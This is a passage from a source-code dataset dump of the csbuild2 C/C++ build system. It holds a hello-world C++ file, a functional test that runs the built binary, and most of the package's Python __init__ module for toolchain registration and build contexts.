\"C\"\n{\n\textern int getnum();\n}\n\nint main()\n{\n\tprintf(\"getnum() = %d\", getnum());\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.6483516693115234, "alphanum_fraction": 0.6483516693115234, "avg_line_length": 12, "blob_id": "33a00a1771f7c3125edb6dcfd6f99b65fdf1bcac", "content_id": "30957f4bd5ba88fa078cdad8ba59ba5f62bf87a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 91, "license_type": "no_license", "max_line_length": 25, "num_lines": 7, "path": "/functional_tests/basic_cpp_test/hello_world/hello.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include \"header.hpp\"\n\nvoid hello_world()\n{\n\tprintf(\"Hello, World!\");\n}\n" }, { "alpha_fraction": 0.7609195113182068, "alphanum_fraction": 0.7627586126327515, "avg_line_length": 38.54545593261719, "blob_id": "8330c2df9935b32352f912fbe538f9360c4d354f", "content_id": "95e390b24fd573a217812dd1ff7bf0278f0f70fc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2175, "license_type": "no_license", "max_line_length": 82, "num_lines": 55, "path": "/functional_tests/output_files_sync_after_build_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Test that files can be executed immediately after being built\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom csbuild._testing.functional_test import FunctionalTest\nfrom csbuild._utils import PlatformBytes\n\nimport os\nimport subprocess\nimport platform\n\nclass OutputFilesSyncAfterBuildTest(FunctionalTest):\n\t\"\"\"Test for accessing output files after being linked.\"\"\"\n\n\t# pylint: disable=invalid-name\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.outputFile = \"out/hello_world.exe\"\n\t\telse:\n\t\t\tself.outputFile = \"out/hello_world\"\n\t\tFunctionalTest.setUp(self, cleanArgs=[\"--project=hello_world\"])\n\n\tdef testAccessAfterSyncWorks(self):\n\t\t\"\"\"Test that C++ linker output is accessible immediately after being created.\"\"\"\n\t\tself.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\n\t\tself.assertTrue(os.path.exists(self.outputFile))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World!\"))\n" }, { "alpha_fraction": 0.7241330146789551, "alphanum_fraction": 0.7273540496826172, "avg_line_length": 32.26309585571289, "blob_id": "a26642cdb4dbe4df903299546b7c790a6a0ae2df", "content_id": "c1b5a2c232f588877e4027001a8d7b793131a066", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27941, "license_type": "no_license", "max_line_length": 178, "num_lines": 840, "path": "/csbuild/__init__.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. package:: csbuild\n\t:synopsis: cross-platform c/c++ build system\n\n.. moduleauthor:: Jaedyn K. Draper, Zoe J. Bare\n.. attention:: To support CSBuild's operation, Python's import lock is DISABLED once CSBuild has started.\nThis should not be a problem for most makefiles, but if you do any threading within your makefile, take note:\nanything that's imported and used by those threads should always be implemented on the main thread before that\nthread's execution starts. Otherwise, CSBuild does not guarantee that the import will have completed\nonce that thread tries to use it. Long story short: Don't import modules within threads.\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport glob\nimport traceback\n\nfrom . import perf_timer\nfrom ._utils import PlatformUnicode, StrType\n\nwith perf_timer.PerfTimer(\"csbuild module init\"):\n\timport sys\n\timport signal\n\timport os\n\timport platform\n\n\tif sys.version_info[0] >= 3:\n\t\tfrom collections.abc import Callable\n\t\t_typeType = type\n\t\t_classType = type\n\telse:\n\t\tfrom collections import Callable\n\t\timport types\n\t\t# pylint: disable=invalid-name\n\t\t_typeType = types.TypeType\n\t\t_classType = types.ClassType\n\n\tfrom ._utils import shared_globals\n\n\t__author__ = \"Jaedyn K. Draper, Zoe J. Bare\"\n\t__copyright__ = 'Copyright (C) 2012-2014 Jaedyn K. Draper'\n\t__credits__ = [\"Jaedyn K. Draper\", \"Zoe J. Bare\", \"Jeff Grills\", \"Randy Culley\"]\n\t__license__ = 'MIT'\n\n\t__maintainer__ = \"Jaedyn K. Draper\"\n\t__email__ = \"[email protected]\"\n\t__status__ = \"Development\"\n\n\t_standardArchName = None\n\n\taddDefaultTargets = True\n\n\ttry:\n\t\twith open(os.path.join(os.path.dirname(__file__), \"version\"), \"r\") as versionFile:\n\t\t\t__version__ = versionFile.read()\n\texcept IOError:\n\t\t__version__ = \"ERR_VERSION_FILE_MISSING\"\n\n\tdef _getElementFromToolchains(selfobj, allToolchains, item):\n\t\tfuncs = set()\n\t\tvals = set()\n\t\thasNonFunc = False\n\t\tfor tempToolchain in allToolchains:\n\t\t\tfound = False\n\t\t\tfor tool in tempToolchain.GetAllTools():\n\t\t\t\tif hasattr(tool, item):\n\t\t\t\t\tcls = None\n\t\t\t\t\tfunc = None\n\t\t\t\t\tfor cls in tool.mro():\n\t\t\t\t\t\tif item in cls.__dict__:\n\t\t\t\t\t\t\tfunc = cls.__dict__[item]\n\t\t\t\t\t\t\tbreak\n\n\t\t\t\t\tif not isinstance(func, (Callable, property, staticmethod)) or isinstance(func, (_classType, _typeType)):\n\t\t\t\t\t\thasNonFunc = True\n\t\t\t\t\t\tfuncs.add((None, cls, func))\n\t\t\t\t\t\tvals.add(func)\n\t\t\t\t\telse:\n\t\t\t\t\t\tassert isinstance(func, staticmethod), \"Only static tool methods can be called by makefiles\"\n\t\t\t\t\t\tfuncs.add((tempToolchain, cls, func))\n\t\t\t\t\tfound = True\n\t\t\tif not found and hasattr(tempToolchain, item):\n\t\t\t\tfuncs.add((tempToolchain, None, getattr(tempToolchain, item)))\n\n\t\tif not funcs:\n\t\t\treturn object.__getattribute__(selfobj, item)\n\n\t\tif hasNonFunc:\n\t\t\tif len(funcs) != 1:\n\t\t\t\traise AttributeError(\n\t\t\t\t\t\"Toolchain attribute {} is ambiguous (exists on multiple tools). Try accessing on the class directly, or through toolchain.Tool(class)\".format(item)\n\t\t\t\t)\n\t\t\treturn funcs.pop()[2]\n\n\t\tdef _runFuncs(*args, **kwargs):\n\t\t\trets = []\n\t\t\tfor tempToolchain, tool, func in funcs:\n\t\t\t\tif tool is None:\n\t\t\t\t\trets.append(func(*args, **kwargs))\n\t\t\t\telse:\n\t\t\t\t\twith tempToolchain.Use(tool):\n\t\t\t\t\t\trets.append(func.__get__(tool)(*args, **kwargs))\n\t\t\tif len(rets) == 1:\n\t\t\t\treturn rets[0]\n\t\t\tif len(rets) > 1:\n\t\t\t\treturn MultiDataContext(rets)\n\t\t\treturn None\n\n\t\treturn _runFuncs\n\n\tclass Csbuild(object):\n\t\t\"\"\"\n\t\tClass that represents the actual csbuild module and replaces this module before anything can interact with it.\n\t\tThis is done this way so context managers work - within a context manager, new methods have to become\n\t\taccessible, so there has to be a __getattr__ overload on the module. This is the only method by which\n\t\tsuch an overload is possible.\n\n\t\tNote that while this could be considered a \"hack\", it is a hack that's officially endorsed by Guido Van Rossum,\n\t\tand the import machinery goes out of its way to intentionally support this behavior.\n\t\t\"\"\"\n\t\tdef __init__(self):\n\t\t\tclass _toolchainMethodResolver(object):\n\t\t\t\tdef __getattribute__(self, item):\n\t\t\t\t\ttry:\n\t\t\t\t\t\tallToolchains = csbuild.currentPlan.GetTempToolchainsInCurrentContexts(*shared_globals.allToolchains)\n\t\t\t\t\texcept NameError:\n\t\t\t\t\t\t# Can and do get here before currentPlan is defined,\n\t\t\t\t\t\t# in which case we don't care because we're not ready to look there anyway,\n\t\t\t\t\t\t# so just go ahead and raise an error.\n\t\t\t\t\t\treturn object.__getattribute__(self, item)\n\t\t\t\t\treturn _getElementFromToolchains(self, allToolchains, item)\n\n\t\t\tself._resolver = _toolchainMethodResolver()\n\t\t\tself._module = sys.modules[\"csbuild\"]\n\n\t\tdef __getattr__(self, name):\n\t\t\tif hasattr(self._module, name):\n\t\t\t\treturn getattr(self._module, name)\n\n\t\t\tif self._resolver is not None:\n\t\t\t\tpreviousResolver = self._resolver\n\t\t\t\tself._resolver = None\n\t\t\t\tif hasattr(previousResolver, name):\n\t\t\t\t\tret = getattr(previousResolver, name)\n\t\t\t\t\tself._resolver = previousResolver\n\t\t\t\t\treturn ret\n\t\t\t\tself._resolver = previousResolver\n\n\t\t\treturn object.__getattribute__(self, name)\n\n\n\tsys.modules[\"csbuild\"] = Csbuild()\n\tcsbuild = sys.modules[\"csbuild\"]\n\n\t# pylint: disable=wrong-import-position\n\tfrom ._build.context_manager import ContextManager, MultiDataContext\n\tfrom ._build import project_plan, project, input_file\n\n\tfrom . import _build, log\n\tfrom ._utils import system\n\tfrom ._utils.string_abc import String\n\tfrom ._utils.decorators import TypeChecked\n\tfrom ._utils import ordered_set\n\tfrom ._utils import PlatformString\n\n\tfrom .toolchain import toolchain\n\n\t#Avoid double init if this module's imported twice for some reason\n\t#Test framework does this because run_unit_tests.py needs to import to get access to RunTests and logging\n\t#and then test discovery ends up importing it again and causing havok if this block happens twice\n\tif not hasattr(sys.modules[\"csbuild\"], \"currentPlan\"):\n\t\tcsbuild.currentPlan = None # Set to None because ProjectPlan constructor needs to access it.\n\t\tcsbuild.currentPlan = project_plan.ProjectPlan(\"\", \"\", [], 0, False, False, False, os.path.dirname(sys.modules['__main__'].__file__))\n\n\tclass ProjectType(object):\n\t\t\"\"\"\n\t\t'enum' representing the available project types.\n\t\t\"\"\"\n\t\tStub = 0\n\t\tApplication = 1\n\t\tSharedLibrary = 2\n\t\tStaticLibrary = 3\n\n\tclass ScopeDef(object):\n\t\t\"\"\"\n\t\t'enum' representing the types of valid scopes\n\t\t\"\"\"\n\t\tIntermediate = \"intermediate\"\n\t\tFinal = \"final\"\n\t\tChildren = \"children\"\n\t\tAll = \"all\"\n\n\tclass StaticLinkMode( object ):\n\t\t\"\"\"\n\t\t'enum' representing the manner by which to handle static linking\n\t\t\"\"\"\n\t\tLinkLibs = 0\n\t\tLinkIntermediateObjects = 1\n\n\tRunMode = shared_globals.RunMode\n\n\tclass BuildFailureException(Exception):\n\t\t\"\"\"\n\t\tNotify a build failed.\n\n\t\t:param buildProject: Project being built\n\t\t:type buildProject: project.Project\n\t\t:param inputFile: The file(s) being built\n\t\t:type inputFile: input_file.InputFile or ordered_set.OrderedSet\n\t\t:param info: Extra details about the failure\n\t\t:type info: str\n\t\t\"\"\"\n\t\t@TypeChecked(buildProject=project.Project, inputFile=(input_file.InputFile, ordered_set.OrderedSet), info=String)\n\t\tdef __init__(self, buildProject, inputFile, info=\"\"):\n\t\t\tException.__init__(self)\n\t\t\tself.project = buildProject\n\t\t\tself.inputFile = inputFile\n\t\t\tself.info = info\n\n\t\tdef __repr__(self):\n\t\t\tret = \"Build for {} in project {} failed!\".format(\n\t\t\t\tself.inputFile,\n\t\t\t\tself.project\n\t\t\t)\n\t\t\tif self.info:\n\t\t\t\tret += \"\\n\\t\" + \"\\n\\t\".join(self.info.splitlines())\n\t\t\treturn ret\n\n\t@TypeChecked(_return=int)\n\tdef GetRunMode():\n\t\t\"\"\"\n\t\tGet information on how csbuild was invoked.\n\n\t\t:return: Run mode class member\n\t\t:rtype: int\n\t\t\"\"\"\n\t\treturn shared_globals.runMode\n\n\t@TypeChecked(_return=StrType)\n\tdef GetSolutionArgs():\n\t\t\"\"\"\n\t\tGet the value passed to the --solution-args option.\n\n\t\t:return: Solution args string.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn shared_globals.solutionArgs\n\n\t@TypeChecked(_return=StrType)\n\tdef GetSolutionPath():\n\t\t\"\"\"\n\t\tGet the root path when generating projects.\n\n\t\t:return: Root solution path.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\treturn shared_globals.solutionPath\n\n\t@TypeChecked(_return=StrType)\n\tdef GetSystemArchitecture():\n\t\t\"\"\"\n\t\tGet the standard name for the architecture of the system currently running csbuild.\n\n\t\t:return: System standard architecture name.\n\t\t:rtype: str\n\t\t\"\"\"\n\t\tglobal _standardArchName\n\t\tif _standardArchName is None:\n\t\t\tis64Bit = platform.architecture()[0].lower() == \"64bit\"\n\t\t\tx86Archs = [\"x64\", \"x86_64\", \"amd64\", \"x86\", \"i386\", \"i686\"]\n\t\t\tppcArchs = [\"powerpc\", \"ppc64\"]\n\t\t\tmachine = platform.machine().lower()\n\n\t\t\t# x86 compatible architectures\n\t\t\tif machine in x86Archs:\n\t\t\t\t_standardArchName = \"x64\" if is64Bit else \"x86\"\n\n\t\t\t# ppc architectures\n\t\t\telif machine in ppcArchs:\n\t\t\t\t_standardArchName = \"ppc64\" if is64Bit else \"ppc\"\n\n\t\t\t# arm architectures\n\t\t\telif machine.startswith(\"arm\"):\n\t\t\t\t_standardArchName = \"arm64\" if is64Bit else \"arm\"\n\n\t\t\t# arm 64-bit architecture (special case for some platforms)\n\t\t\telif machine.startswith(\"aarch64\"):\n\t\t\t\t_standardArchName = \"arm64\"\n\n\t\t\t# mips architectures\n\t\t\telif machine.startswith(\"mips\"):\n\t\t\t\t_standardArchName = \"mips64\" if is64Bit else \"mips\"\n\n\t\t\t# sparc architectures\n\t\t\telif machine.startswith(\"sparc\"):\n\t\t\t\t_standardArchName = \"sparc64\" if is64Bit else \"sparc\"\n\n\t\t\t# unknown\n\t\t\telse:\n\t\t\t\t# Architecture type is unknown, so use whatever was returned by platform.machine().\n\t\t\t\t_standardArchName = machine\n\n\t\treturn PlatformUnicode(_standardArchName)\n\n\t@TypeChecked(name=String, projectType=int)\n\tdef SetOutput(name, projectType=ProjectType.Application):\n\t\t\"\"\"\n\t\tSet the project output name and type\n\n\t\t:param name: Project name\n\t\t:type name: str, bytes\n\t\t:param projectType: Type of project\n\t\t:type projectType: ProjectType\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"outputName\", name)\n\t\tcsbuild.currentPlan.SetValue(\"projectType\", projectType)\n\n\t@TypeChecked(name=String, defaultArchitecture=String)\n\tdef RegisterToolchain(name, defaultArchitecture, *tools, **kwargs):\n\t\t\"\"\"\n\t\tRegister a new toolchain to be used by the project for building\n\n\t\t:param name: The name of the toolchain, which will be used to reference it\n\t\t:type name: str, bytes\n\t\t:param defaultArchitecture: The default architecture to be used for this toolchain\n\t\t:type defaultArchitecture: str, bytes\n\t\t:param tools: List of tools to be used to make the toolchain.\n\t\t:type tools: class\n\t\t:param kwargs: Specify parameter `checkers` to include a dictionary of extension to csbuild.toolchain.CompileChecker instances\n\t\t\tThese checkers will be used to determine whether or not to recompile files\n\t\t:type kwargs: any\n\t\t\"\"\"\n\t\tnames = set()\n\t\tfor tool in tools:\n\t\t\tif tool.__name__ in names:\n\t\t\t\tlog.Warn(\n\t\t\t\t\t\"Toolchain {} contains multiple tools with the same class name ('{}'). \"\n\t\t\t\t\t\"All but the first will be inaccessible in macro formatting, which accesses tools by class name.\",\n\t\t\t\t\tname,\n\t\t\t\t\ttool.__name__\n\t\t\t\t )\n\t\t\tnames.add(tool.__name__)\n\t\tshared_globals.allToolchains.add(name)\n\n\t\tif shared_globals.runMode == RunMode.GenerateSolution:\n\t\t\ttools = list(tools)\n\t\t\ttools.extend(list(shared_globals.allGeneratorTools))\n\n\t\tcsbuild.currentPlan.EnterContext((\"toolchain\", (name,)))\n\n\t\ttry:\n\t\t\tcheckers = kwargs.get(\"checkers\", {})\n\t\t\tif checkers:\n\t\t\t\tcsbuild.currentPlan.UpdateDict(\"checkers\", checkers)\n\n\t\t\tcsbuild.currentPlan.SetValue(\"tools\", ordered_set.OrderedSet(tools))\n\t\t\tcsbuild.currentPlan.SetValue(\"_tempToolchain\", toolchain.Toolchain({}, *tools, runInit=False, checkers=checkers))\n\t\t\tcsbuild.currentPlan.defaultArchitectureMap[name] = defaultArchitecture\n\t\tfinally:\n\t\t\tcsbuild.currentPlan.LeaveContext()\n\n\t\tfor tool in tools:\n\t\t\tif tool.supportedArchitectures is not None:\n\t\t\t\tshared_globals.allArchitectures.update(tool.supportedArchitectures)\n\n\t@TypeChecked(name=String, projectTools=list, solutionTool=(_classType, _typeType))\n\tdef RegisterProjectGenerator(name, projectTools, solutionTool):\n\t\t\"\"\"\n\t\tRegister a new toolchain to be used by the project for building\n\n\t\t:param name: The name of the toolchain, which will be used to reference it\n\t\t:type name: str, bytes\n\t\t:param projectTools: List of tools to be used to make individual project files\n\t\t:type projectTools: list[class]\n\t\t:param solutionTool: tool to generate the final solution file\n\t\t:type solutionTool: class\n\t\t\"\"\"\n\n\t\tfor tool in projectTools:\n\t\t\tshared_globals.allGeneratorTools.add(tool)\n\t\tshared_globals.allGenerators[name] = shared_globals.GeneratorData(set(projectTools), solutionTool)\n\n\t\tif shared_globals.runMode == RunMode.GenerateSolution:\n\t\t\tfor tool in projectTools:\n\t\t\t\tsys.modules[\"csbuild\"].Toolchain(*shared_globals.allToolchains).AddTool(tool)\n\n\t@TypeChecked(name=String)\n\tdef RegisterToolchainGroup(name, *toolchains):\n\t\t\"\"\"\n\t\tAdd a toolchain group, a single identifier to serve as an alias for multiple toolchains\n\n\t\t:param name: Name of the group\n\t\t:type name: str\n\t\t:param toolchains: Toolchain to alias\n\t\t:type toolchains: str\n\t\t\"\"\"\n\t\tshared_globals.toolchainGroups[name] = set(toolchains)\n\n\t@TypeChecked(toolchainName=String)\n\tdef SetDefaultToolchain(toolchainName):\n\t\t\"\"\"\n\t\tSet the default toolchain to be used.\n\t\t:param toolchainName: Name of the toolchain\n\t\t:type toolchainName: str, bytes\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.defaultToolchain = toolchainName\n\n\t@TypeChecked(architectureName=String)\n\tdef SetDefaultArchitecture(architectureName):\n\t\t\"\"\"\n\t\tSet the default architecture to be used.\n\t\t:param architectureName: Name of the architecture\n\t\t:type architectureName: str, bytes\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.defaultArchitecture = architectureName\n\n\t@TypeChecked(targetName=String)\n\tdef SetDefaultTarget(targetName):\n\t\t\"\"\"\n\t\tSet the default target to be used.\n\t\t:param targetName: Name of the target\n\t\t:type targetName: str, bytes\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.defaultTarget = targetName\n\n\tdef SetSupportedArchitectures(*args):\n\t\t\"\"\"\n\t\tSet the supported architectures for the enclosing scope\n\t\t:param args: Architectures to support\n\t\t:type args: str\n\t\t\"\"\"\n\t\tarchitectures = csbuild.currentPlan.selfLimits[\"architecture\"]\n\t\tif architectures:\n\t\t\tarchitectures.intersection_update(args)\n\t\telse:\n\t\t\tarchitectures.update(args)\n\n\tdef SetSupportedToolchains(*args):\n\t\t\"\"\"\n\t\tSet the supported toolchains for the enclosing scope\n\t\t:param args: Toolchains to support\n\t\t:type args: str\n\t\t\"\"\"\n\t\ttoolchains = csbuild.currentPlan.selfLimits[\"toolchain\"]\n\t\tif toolchains:\n\t\t\ttoolchains.intersection_update(args)\n\t\telse:\n\t\t\ttoolchains.update(args)\n\n\tdef SetSupportedTargets(*args):\n\t\t\"\"\"\n\t\tSet the supported targets for the enclosing scope\n\t\t:param args: Targets to support\n\t\t:type args: str\n\t\t\"\"\"\n\t\ttargets = csbuild.currentPlan.selfLimits[\"target\"]\n\t\tif targets:\n\t\t\ttargets.intersection_update(args)\n\t\telse:\n\t\t\ttargets.update(args)\n\n\tdef SetSupportedPlatforms(*args):\n\t\t\"\"\"\n\t\tSet the supported platforms for the enclosing scope\n\t\t:param args: Platforms to support\n\t\t:type args: str\n\t\t\"\"\"\n\t\tplatforms = csbuild.currentPlan.selfLimits[\"platform\"]\n\t\tif platforms:\n\t\t\tplatforms.intersection_update(args)\n\t\telse:\n\t\t\tplatforms.update(args)\n\n\tdef SetUserData(key, value):\n\t\t\"\"\"\n\t\tAdds miscellaneous data to a project. This can be used later in a build event or in a format string.\n\n\t\tThis becomes an attribute on the project's userData member variable. As an example, to set a value:\n\n\t\tcsbuild.SetUserData(\"someData\", \"someValue\")\n\n\t\tThen to access it later:\n\n\t\tproject.userData.someData\n\n\t\t:param key: name of the variable to set\n\t\t:type key: str\n\t\t:param value: value to set to that variable\n\t\t:type value: any\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.UpdateDict(\"_userData\", {key : value})\n\n\tdef SetOutputDirectory(outputDirectory):\n\t\t\"\"\"\n\t\tSpecifies the directory in which to place the output file.\n\n\t\t:param outputDirectory: The output directory, relative to the current script location, NOT to the project working directory.\n\t\t:type outputDirectory: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"outputDir\", os.path.abspath(outputDirectory) if outputDirectory else \"\")\n\n\tdef SetIntermediateDirectory(intermediateDirectory):\n\t\t\"\"\"\n\t\tSpecifies the directory in which to place the intermediate files.\n\n\t\t:param intermediateDirectory: The output directory, relative to the current script location, NOT to the project working directory.\n\t\t:type intermediateDirectory: str\n\t\t\"\"\"\n\t\tcsbuild.currentPlan.SetValue(\"intermediateDir\", os.path.abspath(intermediateDirectory) if intermediateDirectory else \"\")\n\n\tdef AddExcludeFiles(*files):\n\t\t\"\"\"\n\t\tManually exclude source files from the build.\n\n\t\t:param files: Files to exclude\n\t\t:type files: str\n\t\t\"\"\"\n\t\tfixedUpFiles = set()\n\t\tfor f in files:\n\t\t\tfor match in glob.glob(os.path.abspath(f)):\n\t\t\t\tfixedUpFiles.add(match)\n\t\tcsbuild.currentPlan.UnionSet(\"excludeFiles\", fixedUpFiles)\n\n\tdef AddExcludeDirectories(*dirs):\n\t\t\"\"\"\n\t\tManually exclude source directories from the build.\n\n\t\t:param dirs: Directories to exclude\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tfixedUpDirs = set()\n\t\tfor f in dirs:\n\t\t\tfor match in glob.glob(os.path.abspath(f)):\n\t\t\t\tfixedUpDirs.add(match)\n\t\tcsbuild.currentPlan.UnionSet(\"excludeDirs\", fixedUpDirs)\n\n\tdef AddSourceFiles(*files):\n\t\t\"\"\"\n\t\tManually add source files to the build.\n\n\t\t:param files: Files to add\n\t\t:type files: str\n\t\t\"\"\"\n\t\tfixedUpFiles = set()\n\t\tfor f in files:\n\t\t\tfor match in glob.glob(os.path.abspath(f)):\n\t\t\t\tfixedUpFiles.add(match)\n\t\tcsbuild.currentPlan.UnionSet(\"sourceFiles\", fixedUpFiles)\n\n\tdef AddSourceDirectories(*dirs):\n\t\t\"\"\"\n\t\tManually add source directories to the build.\n\n\t\t:param dirs: Directories to add\n\t\t:type dirs: str\n\t\t\"\"\"\n\t\tfixedUpDirs = set()\n\t\tfor f in dirs:\n\t\t\tfor match in glob.glob(os.path.abspath(f)):\n\t\t\t\tfixedUpDirs.add(match)\n\t\tcsbuild.currentPlan.UnionSet(\"sourceDirs\", fixedUpDirs)\n\n\tclass Scope(ContextManager):\n\t\t\"\"\"\n\t\tEnter a scope. Settings within this scope will be passed on to libraries that include this lib for intermediate,\n\t\tor to applications that include it for final. Anything that depends on this lib will inherit a value set to children,\n\t\tand a value set to all will be applied to this lib as well as inherited by children.\n\n\t\t:param scopeTypes: Scope type to enter\n\t\t:type scopeTypes: ScopeDef\n\t\t\"\"\"\n\t\tdef __init__(self, *scopeTypes):\n\t\t\tallScopes = (\n\t\t\t\tScopeDef.Intermediate,\n\t\t\t\tScopeDef.Final,\n\t\t\t\tScopeDef.Children,\n\t\t\t\tScopeDef.All\n\t\t\t)\n\t\t\tfor scopeType in scopeTypes:\n\t\t\t\tassert scopeType in allScopes, \"Invalid scope type\"\n\t\t\tContextManager.__init__(self, ((\"scope\", scopeTypes),))\n\n\tclass Toolchain(ContextManager):\n\t\t\"\"\"\n\t\tApply values to a specific toolchain\n\n\t\t:param toolchainNames: Toolchain identifier\n\t\t:type toolchainNames: str, bytes\n\t\t\"\"\"\n\t\tdef __init__(self, *toolchainNames):\n\t\t\tclass _toolchainMethodResolver(object):\n\t\t\t\tdef __getattribute__(self, item):\n\t\t\t\t\tallToolchains = csbuild.currentPlan.GetTempToolchainsInCurrentContexts(*toolchainNames)\n\t\t\t\t\treturn _getElementFromToolchains(self, allToolchains, item)\n\n\t\t\tContextManager.__init__(self, ((\"toolchain\", toolchainNames),), [_toolchainMethodResolver()])\n\n\tdef ToolchainGroup(*names):\n\t\t\"\"\"\n\t\tApply values to toolchains in a toolchain group\n\t\t:param names: Toolchain group names\n\t\t:type names: str\n\t\t:return: A context manager for the toolchains in the group\n\t\t:rtype: Toolchain\n\t\t\"\"\"\n\t\ttoolchains = set()\n\t\tfor name in names:\n\t\t\ttoolchains |= shared_globals.toolchainGroups[name]\n\t\treturn Toolchain(*toolchains)\n\n\tclass Architecture(ContextManager):\n\t\t\"\"\"\n\t\tApply values to a specific architecture\n\n\t\t:param architectureNames: Architecture identifier\n\t\t:type architectureNames: str, bytes\n\t\t\"\"\"\n\t\tdef __init__(self, *architectureNames):\n\t\t\tContextManager.__init__(self, ((\"architecture\", architectureNames),))\n\n\tclass Platform(ContextManager):\n\t\t\"\"\"\n\t\tApply values to a specific platform\n\n\t\t:param platformNames: Platform identifier\n\t\t:type platformNames: str, bytes\n\t\t\"\"\"\n\t\tdef __init__(self, *platformNames):\n\t\t\tContextManager.__init__(self, ((\"platform\", platformNames),))\n\n\tclass Target(ContextManager):\n\t\t\"\"\"\n\t\tApply values to a specific target\n\n\t\t:param targetNames: target identifiers\n\t\t:type targetNames: str, bytes\n\t\t:param kwargs: if addToCurrentScope is set to False as a keyword argument, only projects inside the scope of this\n\t\t\t\t\t target will be made aware of this target's existence; other projects will be excluded\n\t\t\"\"\"\n\t\tdef __init__(self, *targetNames, **kwargs):\n\t\t\tdef _processKwargs(addToCurrentScope=True):\n\t\t\t\tif addToCurrentScope:\n\t\t\t\t\tcsbuild.currentPlan.knownTargets.update(targetNames)\n\t\t\t\t\tcsbuild.currentPlan.childTargets.update(targetNames)\n\n\t\t\t_processKwargs(**kwargs)\n\n\t\t\tself.oldChildTargets = set(csbuild.currentPlan.childTargets)\n\t\t\tself.targetNames = targetNames\n\n\t\t\tshared_globals.allTargets.update(targetNames)\n\n\t\t\tContextManager.__init__(self, ((\"target\", targetNames),))\n\n\t\tdef __enter__(self):\n\t\t\tcsbuild.currentPlan.childTargets.update(object.__getattribute__(self, \"targetNames\"))\n\t\t\tContextManager.__enter__(self)\n\n\t\tdef __exit__(self, exc_type, exc_val, exc_tb):\n\t\t\tcsbuild.currentPlan.childTargets = object.__getattribute__(self, \"oldChildTargets\")\n\t\t\treturn ContextManager.__exit__(self, exc_type, exc_val, exc_tb)\n\n\tclass MultiContext(ContextManager):\n\t\t\"\"\"\n\t\tCombine multiple contexts into a single context where the code within it will apply if\n\t\tANY of the supplied contexts are valid\n\n\t\t:param contexts: List of other context manager instances\n\t\t:type contexts: ContextManager\n\t\t\"\"\"\n\t\tdef __init__(self, *contexts):\n\t\t\tcontextsDict = {}\n\t\t\tmethodResolvers = set()\n\n\t\t\tfor contextManager in contexts:\n\t\t\t\tobject.__setattr__(contextManager, \"inself\", True)\n\n\t\t\t\tcontextTuple = contextManager.contexts\n\t\t\t\tfor subTuple in contextTuple:\n\t\t\t\t\tcontextsDict.setdefault(subTuple[0], set()).update(subTuple[1])\n\n\t\t\t\tresolvers = contextManager.resolvers\n\t\t\t\tif resolvers:\n\t\t\t\t\tmethodResolvers.update(resolvers)\n\n\t\t\t\tobject.__setattr__(contextManager, \"inself\", False)\n\n\t\t\tif not 